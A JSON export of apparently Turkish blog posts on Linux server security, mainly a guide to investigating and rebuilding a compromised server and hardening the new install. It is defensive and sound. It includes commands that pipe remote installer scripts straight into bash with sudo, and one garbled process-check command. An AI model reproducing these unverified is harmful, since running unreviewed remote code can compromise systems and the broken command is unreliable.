Ortam\u0131nda Deneyin<\/strong>: &Uuml;retim sunucular\u0131nda de\u011fi\u015fiklik yapmadan &ouml;nce mutlaka test edin<\/li>\r\n<li><strong>Dok&uuml;mante Edin<\/strong>: Her de\u011fi\u015fikli\u011fi kay\u0131t alt\u0131na al\u0131n<\/li>\r\n<li><strong>D&uuml;zenli Kontrol<\/strong>: G&uuml;venlik ayarlar\u0131n\u0131 d&uuml;zenli olarak g&ouml;zden ge&ccedil;irin<\/li>\r\n<li><strong>G&uuml;ncel Kal\u0131n<\/strong>: CIS Benchmarks d&uuml;zenli g&uuml;ncellenir, takip edin<\/li>\r\n<li><strong>Yedekleme<\/strong>: Kritik de\u011fi\u015fiklikler &ouml;ncesi sistem yede\u011fi al\u0131n<\/li>\r\n<\/ol>\r\n<h3>Sonraki Ad\u0131mlar:<\/h3>\r\n<ul>\r\n<li>IDS\/IPS sistemi kurulumu<\/li>\r\n<li>WAF (Web Application Firewall) implementasyonu<\/li>\r\n<li>Vulnerability scanning otomasyonu<\/li>\r\n<li>SIEM entegrasyonu<\/li>\r\n<li>Incident response plan\u0131 geli\u015ftirme<\/li>\r\n<\/ul>\r\n<p>Linux g&uuml;venli\u011fi karma\u015f\u0131k g&ouml;r&uuml;nse de, bu temel CIS pratiklerini sistematik olarak uygulayarak sunucular\u0131n\u0131z\u0131 siber tehditlere kar\u015f\u0131 &ouml;nemli &ouml;l&ccedil;&uuml;de koruyabilirsiniz. G&uuml;venlik katmanlar\u0131 prensibi gere\u011fi, hi&ccedil;bir tek &ouml;nlem %100 koruma sa\u011flamaz, ancak bu 7 uygulaman\u0131n kombinasyonu sald\u0131rganlar i&ccedil;in yeterince y&uuml;ksek bir engel olu\u015fturacakt\u0131r. Her sunucu kurulumunda bu listeyi kontrol ederek, g&uuml;venli bir temel &uuml;zerine in\u015fa etmeye devam edin. Unutmay\u0131n: <strong>En iyi savunma, proaktif &ouml;nlemlerdir<\/strong>.<\/p>","excerpt":"Linux sunucu g\u00fcvenli\u011fi konusunda 15+ y\u0131ll\u0131k deneyimim boyunca \u00f6\u011frendi\u011fim en \u00f6nemli \u015fey \u015fu: Varsay\u0131lan konfig\u00fcrasyonlar hi\u00e7bir zaman...","created_at":"2025-06-12 13:27:19","updated_at":"2026-09-23 10:49:27","category_id":7,"view_count":865,"reading_time":12,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2025-06-12 13:27:19","featured_image":"resimyok.jpg","slug":"her-linux-sunucumda-uyguladigim-7-cis-guvenlik-uygulamasi","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":51,"title":"Linux Sunucu G\u00fcvenlik \u0130hlali Sonras\u0131 Yeniden Kurulum","content":"Kimse sunucusunun hacklenmesini d\u00fc\u015f\u00fcnmek istemez. Ancak \u015f\u00fcpheli trafik, de\u011fi\u015ftirilmi\u015f dosyalar veya bilinmeyen kullan\u0131c\u0131lar g\u00f6r\u00fcrseniz, tahmin y\u00fcr\u00fctmektense sistemi yeniden kurmak daha g\u00fcvenlidir. Bu rehberde, bir g\u00fcvenlik ihlali \u015f\u00fcphesi durumunda Linux sunucunuzu nas\u0131l g\u00fcvenli bir \u015fekilde yeniden kuraca\u011f\u0131n\u0131z\u0131, sald\u0131r\u0131n\u0131n nedenini nas\u0131l ara\u015ft\u0131raca\u011f\u0131n\u0131z\u0131 ve yeni sistemi bir sava\u015f alan\u0131na girmi\u015f\u00e7esine nas\u0131l sertle\u015ftirece\u011finizi anlataca\u011f\u0131m. <h2>\ud83d\udea8 \u0130lk Fark Etme: Sunucunuz Ger\u00e7ekten Compromise Edildi mi?<\/h2> <h3>\u015e\u00fcpheli Belirtiler<\/h3> Bir Linux sunucunun g\u00fcvenli\u011finin ihlal edildi\u011fini g\u00f6steren ana belirtiler \u015funlard\u0131r: <strong>Performans Anomalileri:<\/strong> <ul> <li>A\u00e7\u0131klanamayan y\u00fcksek CPU veya memory kullan\u0131m\u0131<\/li> <li>Bilinmeyen s\u00fcre\u00e7lerin \u00e7al\u0131\u015fmas\u0131<\/li> <li>Anormal network trafi\u011fi<\/li> <\/ul> <strong>Sistem De\u011fi\u015fiklikleri:<\/strong> <ul> <li>Yetkilendirilmemi\u015f kullan\u0131c\u0131 hesaplar\u0131<\/li> <li>De\u011fi\u015ftirilmi\u015f sistem dosyalar\u0131<\/li> <li>Web sayfalar\u0131n\u0131n \"Hacked\" mesajlar\u0131yla de\u011fi\u015ftirilmesi<\/li> <li>Beklenmeyen cronjob'lar veya startup script'leri<\/li> <\/ul> <strong>G\u00fcvenlik \u0130hlali \u0130\u015faretleri:<\/strong> <ul> <li>Loglar\u0131n silinmesi veya manip\u00fcle edilmesi<\/li> <li>Bilinen malware imzalar\u0131<\/li> <li>\u015e\u00fcpheli SSH ba\u011flant\u0131lar\u0131<\/li> <li>Rootkit belirtileri<\/li> <\/ul> <h3>H\u0131zl\u0131 De\u011ferlendirme Komutlar\u0131<\/h3> <pre><code ># \u00c7al\u0131\u015fan s\u00fcre\u00e7leri kontrol et ps aux | head -20 ps -elf | grep -v \"^\\ &gt; \/tmp\/suspicious_process_files.txt # Memory bilgileri cat \/proc\/meminfo &gt; \/tmp\/meminfo.txt cat \/proc\/version &gt; \/tmp\/kernel_version.txt <\/code><\/pre> <h3>Log Analizi<\/h3> <pre><code ># Son sistem loglar\u0131n\u0131 incele tail -n 1000 \/var\/log\/syslog &gt; \/tmp\/recent_syslog.txt tail -n 1000 \/var\/log\/auth.log &gt; \/tmp\/recent_auth.txt tail -n 1000 \/var\/log\/apache2\/access.log &gt; \/tmp\/recent_web_access.txt # \u015e\u00fcpheli giri\u015fleri ara grep \"Failed password\" \/var\/log\/auth.log | tail -50 grep \"Accepted password\" \/var\/log\/auth.log | tail -20 grep \"sudo:\" \/var\/log\/auth.log | tail -20 # Son de\u011fi\u015ftirilen dosyalar\u0131 bul find \/ -type f -mtime -1 -ls 2&gt;\/dev\/null | head -100 <\/code><\/pre> <h3>Rootkit Taramas\u0131<\/h3> <pre><code ># Chkrootkit ile tarama sudo chkrootkit &gt; \/tmp\/chkrootkit_results.txt # Rkhunter ile tarama sudo rkhunter -c --sk &gt; \/tmp\/rkhunter_results.txt # AIDE ile dosya b\u00fct\u00fcnl\u00fc\u011f\u00fc kontrol\u00fc sudo aide --check &gt; \/tmp\/aide_results.txt <\/code><\/pre> <h2>\ud83d\udd25 Nuclear Option: Tamamen Yeniden Kurulum<\/h2> <h3>1. Yedek Alma (Temiz Veriler \u0130\u00e7in)<\/h3> <pre><code ># Sadece gerekli kullan\u0131c\u0131 verilerini yedekle mkdir \/tmp\/backup_user_data cp -r \/home\/username\/important_data \/tmp\/backup_user_data\/ cp -r \/var\/www\/html\/uploaded_files \/tmp\/backup_user_data\/ # Konfig\u00fcrasyon dosyalar\u0131n\u0131 g\u00fcvenlik kontrol\u00fc ile yedekle cp \/etc\/apache2\/sites-available\/* \/tmp\/backup_configs\/ cp \/etc\/mysql\/mysql.conf.d\/* \/tmp\/backup_configs\/ <\/code><\/pre> <strong>\u26a0\ufe0f UYARI:<\/strong> Sadece temiz oldu\u011fundan emin oldu\u011funuz dosyalar\u0131 yedekleyin! <h3>2. Forensik \u0130maj Alma<\/h3> <pre><code ># Diskin forensik kopyas\u0131n\u0131 al sudo dd if=\/dev\/sda of=\/external\/disk_image.img bs=4M status=progress sudo sha256sum \/external\/disk_image.img &gt; \/external\/disk_image.sha256 <\/code><\/pre> <h3>3. Tamamen Yeni Kurulum<\/h3> Sistemi yeniden in\u015fa etmek, sisteminiz \u00fczerinde kontrole sahip oldu\u011funuzdan emin olman\u0131n tek yoludur <strong>Fiziksel Sunucu \u0130\u00e7in:<\/strong> <pre><code ># UEFI firmware'i g\u00fcncelle # BIOS ayarlar\u0131n\u0131 s\u0131f\u0131rla # Temiz i\u015fletim sistemi kur <\/code><\/pre> <strong>Sanal Makine \u0130\u00e7in:<\/strong> <pre><code ># Eski diski ay\u0131r # Yeni disk ekle # \u0130\u015fletim sistemini s\u0131f\u0131rdan kur <\/code><\/pre> <h2>\ud83d\udee1\ufe0f Yeni Sistem Sertle\u015ftirme<\/h2> <h3>Temel G\u00fcvenlik Yap\u0131land\u0131rmas\u0131<\/h3> <pre><code ># Sistemi g\u00fcncelle sudo apt update &amp;&amp; sudo apt upgrade -y # Gereksiz servisleri kapat sudo systemctl disable telnet sudo systemctl disable ftp sudo systemctl disable rsh # Firewall konfig\u00fcrasyonu sudo ufw enable sudo ufw default deny incoming sudo ufw default allow outgoing sudo ufw allow ssh sudo ufw allow http sudo ufw allow https <\/code><\/pre> <h3>SSH Sertle\u015ftirme<\/h3> <pre><code ># SSH konfig\u00fcrasyonunu d\u00fczenle sudo nano \/etc\/ssh\/sshd_config # Yap\u0131lacak de\u011fi\u015fiklikler: # PermitRootLogin no # PasswordAuthentication no # PubkeyAuthentication yes # Port 2222 (default port de\u011fi\u015ftir) # MaxAuthTries 3 # LoginGraceTime 30 # AllowUsers your_username sudo systemctl restart ssh <\/code><\/pre> <h3>Otomatik G\u00fcvenlik Ara\u00e7lar\u0131<\/h3> <pre><code ># Fail2Ban kurulumu sudo apt install fail2ban -y # Fail2Ban konfig\u00fcrasyonu sudo cp \/etc\/fail2ban\/jail.conf \/etc\/fail2ban\/jail.local sudo nano \/etc\/fail2ban\/jail.local # ClamAV antivirus kurulumu sudo apt install clamav clamav-daemon -y sudo freshclam sudo systemctl enable clamav-freshclam # AIDE dosya b\u00fct\u00fcnl\u00fck izleme sudo apt install aide -y sudo aide --init sudo mv \/var\/lib\/aide\/aide.db.new \/var\/lib\/aide\/aide.db <\/code><\/pre> <h3>Log \u0130zleme ve SIEM<\/h3> <pre><code ># Rsyslog konfig\u00fcrasyonu sudo nano \/etc\/rsyslog.conf # Loglar\u0131 merkezi sunucuya g\u00f6nder # Auditd kurulumu sudo apt install auditd -y sudo systemctl enable auditd # \u00d6nemli dosyalar\u0131 izleme alt\u0131na al sudo auditctl -w \/etc\/passwd -p wa -k passwd_changes sudo auditctl -w \/etc\/shadow -p wa -k shadow_changes sudo auditctl -w \/etc\/sudoers -p wa -k sudoers_changes <\/code><\/pre> <h2>\ud83d\udd0d Vulnerability Patching<\/h2> <h3>Sistem G\u00fcncellemeleri<\/h3> <pre><code ># Unattended upgrades kurulumu sudo apt install unattended-upgrades -y sudo dpkg-reconfigure -plow unattended-upgrades # Manual g\u00fcvenlik g\u00fcncellemeleri sudo apt list --upgradable sudo apt upgrade -y <\/code><\/pre> <h3>Uygulama G\u00fcvenli\u011fi<\/h3> <pre><code ># Web server sertle\u015ftirme (Apache) sudo nano \/etc\/apache2\/conf-available\/security.conf # ServerTokens Prod # ServerSignature Off # PHP sertle\u015ftirme sudo nano \/etc\/php\/7.4\/apache2\/php.ini # expose_php = Off # allow_url_fopen = Off # allow_url_include = Off # MySQL sertle\u015ftirme sudo mysql_secure_installation <\/code><\/pre> <h2>\ud83d\udcca \u0130zleme ve Alerting<\/h2> <h3>Sistem \u0130zleme<\/h3> <pre><code ># Netdata kurulumu (ger\u00e7ek zamanl\u0131 izleme) bash &lt;(curl -Ss https:\/\/my-netdata.io\/kickstart.sh) # OSSEC HIDS kurulumu wget -q -O - https:\/\/updates.atomicorp.com\/installers\/atomic | sudo bash sudo yum install ossec-hids ossec-hids-server <\/code><\/pre> <h3>Log Analizi<\/h3> <pre><code ># Logwatch kurulumu sudo apt install logwatch -y # Fail2Ban notification konfig\u00fcrasyonu sudo nano \/etc\/fail2ban\/jail.local # action = %(action_mwl)s # mta = sendmail <\/code><\/pre> <h2>\ud83d\ude80 Recovery ve Restore<\/h2> <h3>Veri Geri Y\u00fckleme<\/h3> <pre><code ># Temiz verileri geri y\u00fckle sudo rsync -av \/backup\/clean_data\/ \/var\/www\/html\/ sudo chown -R www-data:www-data \/var\/www\/html\/ # Veritaban\u0131n\u0131 geri y\u00fckle mysql -u root -p database_name &lt; \/backup\/clean_database.sql <\/code><\/pre> <h3>Servis Restorasyonu<\/h3> <pre><code ># Web servisi ba\u015flat sudo systemctl enable apache2 sudo systemctl start apache2 # Veritaban\u0131 servisi sudo systemctl enable mysql sudo systemctl start mysql # SSL sertifikalar\u0131n\u0131 yenile sudo certbot renew --force-renewal <\/code><\/pre> <h2>\ud83d\udcdd Incident Response Dok\u00fcmantasyonu<\/h2> <h3>Olay Raporu \u015eablonu<\/h3> <pre><code ># G\u00fcvenlik Olay\u0131 Raporu ## Olay \u00d6zeti - Tarih\/Saat: - Etkilenen Sistem: - Sald\u0131r\u0131 T\u00fcr\u00fc: - Etki D\u00fczeyi: ## Ke\u015fif - \u0130lk fark eden: - Ke\u015fif y\u00f6ntemi: - \u0130lk g\u00f6zlemler: ## Analiz - Sald\u0131r\u0131 vekt\u00f6r\u00fc: - Kullan\u0131lan ara\u00e7lar: - Zarar verilen dosyalar: - \u00c7al\u0131nan veriler: ## M\u00fcdahale - Al\u0131nan \u00f6nlemler: - Kullan\u0131lan ara\u00e7lar: - Temizlik ad\u0131mlar\u0131: ## Kurtarma - Restore i\u015flemleri: - Servis durumu: - Performans testi: ## Lessons Learned - Sald\u0131r\u0131n\u0131n nedeni: - Al\u0131nacak \u00f6nlemler: - Policy de\u011fi\u015fiklikleri: <\/code><\/pre> <h2>\ud83c\udfaf \u00d6nleyici Tedbirler<\/h2> <h3>D\u00fczenli G\u00fcvenlik De\u011ferlendirmesi<\/h3> <pre><code ># Haftal\u0131k g\u00fcvenlik taramas\u0131 scripti #!\/bin\/bash # security_scan.sh echo \"=== G\u00fcvenlik Taramas\u0131 Ba\u015fl\u0131yor ===\" date # Port taramas\u0131 nmap -sS localhost # Rootkit kontrol\u00fc rkhunter -c --sk # Log analizi grep \"Failed password\" \/var\/log\/auth.log | tail -10 # Disk kullan\u0131m\u0131 df -h # \u00c7al\u0131\u015fan servisler systemctl list-units --type=service --state=running echo \"=== Tarama Tamamland\u0131 ===\" <\/code><\/pre> <h3>Yedekleme Stratejisi<\/h3> <pre><code >#!\/bin\/bash # backup_script.sh BACKUP_DIR=\"\/backup\/$(date +%Y%m%d)\" mkdir -p $BACKUP_DIR # Sistem konfig\u00fcrasyonlar\u0131 tar -czf $BACKUP_DIR\/etc_backup.tar.gz \/etc\/ # Kullan\u0131c\u0131 verileri tar -czf $BACKUP_DIR\/home_backup.tar.gz \/home\/ # Veritaban\u0131 yedekleme mysqldump --all-databases &gt; $BACKUP_DIR\/all_databases.sql # Web dosyalar\u0131 tar -czf $BACKUP_DIR\/web_backup.tar.gz \/var\/www\/ # Yedekleri uzak sunucuya g\u00f6nder rsync -av $BACKUP_DIR\/ backup_server:\/backups\/ <\/code><\/pre> <h2>\ud83d\udd27 Otomasyonla \u0130yile\u015ftirme<\/h2> <h3>Ansible Playbook ile Otomatik Sertle\u015ftirme<\/h3> <pre><code ># security_hardening.yml --- - hosts: all become: yes tasks: - name: Update system packages apt: update_cache: yes upgrade: dist - name: Install security tools apt: name: - fail2ban - rkhunter - aide - clamav state: present - name: Configure SSH lineinfile: path: \/etc\/ssh\/sshd_config regexp: \"{{ item.regexp }}\" line: \"{{ item.line }}\" with_items: - { regexp: '^PermitRootLogin', line: 'PermitRootLogin no' } - { regexp: '^PasswordAuthentication', line: 'PasswordAuthentication no' } notify: restart ssh - name: Configure firewall ufw: rule: \"{{ item.rule }}\" port: \"{{ item.port }}\" proto: \"{{ item.proto }}\" with_items: - { rule: 'allow', port: '22', proto: 'tcp' } - { rule: 'allow', port: '80', proto: 'tcp' } - { rule: 'allow', port: '443', proto: 'tcp' } handlers: - name: restart ssh service: name: ssh state: restarted <\/code><\/pre> <h2>\ud83c\udf93 Sonu\u00e7 ve Tavsiyeler<\/h2> <h3>Ana \u00c7\u0131kar\u0131mlar<\/h3> <ol> <li><strong>H\u0131zl\u0131 M\u00fcdahale Kritiktir<\/strong>: Bir hacker sisteme girdi\u011finde, sistemde ne yapt\u0131\u011f\u0131 hakk\u0131nda hi\u00e7bir fikriniz olmaz - yeni SSH portlar\u0131, yeni hesaplar, yeni payla\u015f\u0131mlar, Apache kurallar\u0131nda ince de\u011fi\u015fiklikler ekleyebilir<\/li> <li><strong>Tam Yeniden Kurulum En G\u00fcvenli Se\u00e7enektir<\/strong>: Sistemin tamamen temizlenmesi ve yeniden kurulmas\u0131, kontrol\u00fcn size ait oldu\u011fundan emin olman\u0131n tek yoludur.<\/li> <li><strong>Prevention &gt; Reaction<\/strong>: D\u00fczenli g\u00fcncellemeler, g\u00fc\u00e7l\u00fc kimlik do\u011frulama ve monitoring ile sald\u0131r\u0131lar\u0131 \u00f6nlemek, m\u00fcdahale etmekten \u00e7ok daha etkilidir.<\/li> <li><strong>Dok\u00fcmantasyon Vazge\u00e7ilmezdir<\/strong>: Her ad\u0131m\u0131 belgeleyin, gelecekteki olaylardan ders \u00e7\u0131kar\u0131n.<\/li> <\/ol> <h3>Son Kontrol Listesi<\/h3> <ul> <li> A\u011f trafi\u011fi izleme aktif<\/li> <li> Otomatik yedekleme \u00e7al\u0131\u015f\u0131yor<\/li> <li> G\u00fcvenlik g\u00fcncellemeleri otomatik<\/li> <li> IDS\/IPS sistemleri aktif<\/li> <li> Log analizi yap\u0131l\u0131yor<\/li> <li>\u00a0plan\u0131 g\u00fcncel<\/li> <li> Tak\u0131m e\u011fitimi tamamland\u0131<\/li> <li> Forensik ara\u00e7lar haz\u0131r<\/li> <\/ul> <strong>Unutmay\u0131n:<\/strong> G\u00fcvenlik ihlali sadece teknik bir sorun de\u011fildir, t\u00fcm \u015firketi etkileyebilir ve ald\u0131\u011f\u0131n\u0131z aksiyonlar maliyetli olabilir. Bu y\u00fczden do\u011fru planlanm\u0131\u015f, sistematik bir yakla\u015f\u0131m benimseyin ve asla tek ba\u015f\u0131n\u0131za hareket etmeyin. Linux sunucu g\u00fcvenli\u011fi s\u00fcrekli bir s\u00fcre\u00e7tir. Bu rehberi temel alarak kendi incident response plan\u0131n\u0131z\u0131 geli\u015ftirin ve d\u00fczenli olarak test edin. \u00c7\u00fcnk\u00fc sald\u0131r\u0131 \"e\u011fer\" de\u011fil \"ne zaman\" sorusudur.","excerpt":"Kimse sunucusunun hacklenmesini d\u00fc\u015f\u00fcnmek istemez. Ancak \u015f\u00fcpheli trafik, de\u011fi\u015ftirilmi\u015f dosyalar veya bilinmeyen kullan\u0131c\u0131lar g\u00f6r\u00fcrseniz,...","created_at":"2025-06-12 13:19:22","updated_at":"2026-09-08 02:17:13","category_id":7,"view_count":734,"reading_time":8,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2025-06-12 13:19:22","featured_image":"resimyok.jpg","slug":"linux-sunucu-guvenlik-ihlali-sonrasi-yeniden-kurulum","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"}]